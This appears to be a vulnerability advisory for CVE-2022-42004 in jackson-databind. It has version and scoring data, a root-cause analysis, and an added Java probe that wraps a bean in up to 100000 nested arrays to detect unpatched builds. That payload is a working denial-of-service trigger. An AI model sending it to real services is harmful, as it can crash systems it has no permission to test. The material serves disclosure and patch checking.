
CVE-2022-42004: Uncontrolled Resource Consumption in FasterXML jackson-databind

CVSS Score (v3.1): 7.5

Basic Information

EPSS Score: 0.44626%
Published: 10/3/2022
Updated: 12/2/2024
KEV Status: No
Technology: Java

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Package Name | Ecosystem | Vulnerable Versions | First Patched Version
com.fasterxml.jackson.core:jackson-databind | maven | < 2.12.7.1 | 2.12.7.1
com.fasterxml.jackson.core:jackson-databind | maven | >= 2.13.0, < 2.13.4 | 2.13.4

Vulnerability Intelligence
Root Cause Analysis (Miggo AI)

The vulnerability is in BeanDeserializer._deserializeFromArray, the path taken when a bean is deserialized from a JSON array. With DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS enabled, the method consumes the opening START_ARRAY and recurses into the bean's deserializer for the wrapped value. Before the patch nothing checked whether that wrapped value was itself another array, so every additional level of a payload such as [[[[...]]]] adds another round of recursion, and a sufficiently deep input exhausts the thread stack (StackOverflowError), the resource exhaustion the CVE describes. The commit diff adds exactly that missing check: immediately after the first array is unwrapped, if the next token is again START_ARRAY, deserialization is rejected with an input-mismatch exception instead of recursing. The modified test cases and the CVE description both name this function as the attack vector. The issue requires UNWRAP_SINGLE_VALUE_ARRAYS to be enabled; applications running with default deserialization settings are not affected. Primitive and wrapper-type deserializers in StdDeserializer had the same weakness, tracked separately as CVE-2022-42003; CVE-2022-42004 covers only the BeanDeserializer path, fixed in 2.12.7.1 and 2.13.4.
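The following probe is an added example, not code from Miggo or from the Jackson project. It shows the described behaviour end to end: it enables UNWRAP_SINGLE_VALUE_ARRAYS, wraps a small bean in a configurable number of arrays and classifies what the mapper does with it. The Point bean, the nestedPayload and probe helpers and the sample payload are assumptions constructed here. On an unpatched build a depth of 2 is silently accepted and a large depth ends in StackOverflowError; on 2.12.7.1 / 2.13.4 and later the second START_ARRAY is rejected with a MismatchedInputException before any recursion happens, whatever the depth.

```java
import com.fasterxml.jackson.databind.DeserializationFeature;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.MismatchedInputException;

import java.io.IOException;

/** Added example (not Jackson or Miggo code): probes how a given jackson-databind build
 *  handles a bean wrapped in deeply nested arrays when UNWRAP_SINGLE_VALUE_ARRAYS is on. */
public class NestedArrayUnwrapCheck {

    /** Plain bean; it is handled by BeanDeserializer, the code path named in CVE-2022-42004.
     *  (Assumed example type, constructed for this probe.) */
    public static class Point {
        public int x;
        public int y;
    }

    /** Builds `[[[...{"x":1,"y":2}...]]]` with `depth` wrapper arrays (constructed sample input). */
    static String nestedPayload(int depth) {
        StringBuilder sb = new StringBuilder(depth * 2 + 16);
        for (int i = 0; i < depth; i++) sb.append('[');
        sb.append("{\"x\":1,\"y\":2}");
        for (int i = 0; i < depth; i++) sb.append(']');
        return sb.toString();
    }

    /** Deserializes the payload and returns a one-line verdict instead of propagating failures,
     *  so the vulnerable and patched outcomes can be compared side by side. */
    static String probe(ObjectMapper mapper, int depth) {
        try {
            Point p = mapper.readValue(nestedPayload(depth), Point.class);
            return "accepted (x=" + p.x + ", y=" + p.y + ")";
        } catch (MismatchedInputException e) {
            // Patched behaviour (2.12.7.1 / 2.13.4+): the second START_ARRAY is rejected up front.
            return "rejected: " + e.getOriginalMessage();
        } catch (StackOverflowError e) {
            // Vulnerable behaviour: _deserializeFromArray recursed once per wrapper array
            // until the thread stack ran out.
            return "StackOverflowError (vulnerable build)";
        } catch (IOException e) {
            return "other error: " + e.getClass().getSimpleName() + ": " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        // The vulnerable configuration: single-value array unwrapping enabled.
        ObjectMapper unwrapping = new ObjectMapper()
                .enable(DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS);

        // depth 1 is the feature's intended use and is accepted on every version.
        System.out.println("unwrap on,  depth 1:      " + probe(unwrapping, 1));
        // depth 2 separates the builds: unpatched accepts it, patched rejects it.
        System.out.println("unwrap on,  depth 2:      " + probe(unwrapping, 2));
        // A deep payload is what an attacker would send; only an unpatched build recurses into it.
        System.out.println("unwrap on,  depth 100000: " + probe(unwrapping, 100_000));

        // Default settings: the array path is never entered, so the issue cannot be triggered.
        ObjectMapper defaults = new ObjectMapper();
        System.out.println("unwrap off, depth 2:      " + probe(defaults, 2));
    }
}
```

Run it against the jackson-databind version actually on the application's classpath (for example by adding the class to the project's test sources); a result of "StackOverflowError" or "accepted" for depth 2 means the build is unpatched, while "rejected" at depth 2 confirms the fix is present. The depth of 100000 is chosen only to make the overflow reliable with a default JVM thread stack; the probe catches the Error so a vulnerable run still terminates normally.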

WAF Protection Rules

WAF Rule

In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. This issue can only happen when th
